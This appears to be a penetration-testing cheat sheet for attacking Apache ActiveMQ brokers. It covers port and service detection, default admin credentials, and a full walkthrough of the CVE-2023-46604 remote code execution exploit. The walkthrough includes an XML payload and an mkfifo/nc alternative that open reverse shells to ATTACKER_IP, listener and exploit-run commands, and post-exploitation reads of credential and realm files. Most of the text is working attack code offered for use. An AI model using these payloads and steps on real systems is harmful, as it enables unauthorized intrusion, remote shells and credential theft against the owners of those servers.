Message broker software - often runs with elevated privileges.
Default Ports:
| Port | Service |
|---|---|
| 8161 | Web Console (HTTP/Jetty) |
| 61616 | OpenWire transport |
| 61613 | STOMP |
| 61614 | HTTP/WebSocket |
| 5672 | AMQP |
| 1883 | MQTT |
# Nmap detection
nmap -sC -sV -p 8161,61616,61613,61614,5672,1883 $ip
# Look for
ActiveMQ OpenWire transport
basic realm=ActiveMQRealm
Jetty(9.4.x)| Username | Password |
|---|---|
admin |
admin |
| (blank) | (blank) |
Web console: http://TARGET:8161/admin/
Affected: Apache ActiveMQ < 5.15.16, < 5.16.7, < 5.17.6, < 5.18.3
Port: 61616 (OpenWire transport)
# Go version (recommended)
git clone https://github.com/rootsecdev/CVE-2023-46604.git
# Python version
git clone https://github.com/evkl1d/CVE-2023-46604.gitCreate poc-linux.xml:
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value>bash -i >& /dev/tcp/ATTACKER_IP/9001 0>&1</value>
</list>
</constructor-arg>
</bean>
</beans>Alternative payload (mkfifo):
<value>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER_IP 9001 >/tmp/f</value># 1. Host the XML payload
python3 -m http.server 8000
# 2. Start listener
nc -nlvp 9001
# 3. Run exploit (Go version)
./ActiveMQ-RCE -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml
# Python version
python3 exploit.py -i TARGET_IP -p 61616 -u http://ATTACKER_IP:8000/poc-linux.xml# If web server gets hit but no shell, check XML payload encoding
# Make sure > for > and & for &ActiveMQ often runs as dedicated user:
# Check user
id
# uid=1000(activemq) gid=1000(activemq)
# Config files
ls -la /opt/apache-activemq-*/conf/
cat /opt/apache-activemq-*/conf/activemq.xml
cat /opt/apache-activemq-*/conf/jetty-realm.properties
cat /opt/apache-activemq-*/conf/credentials.properties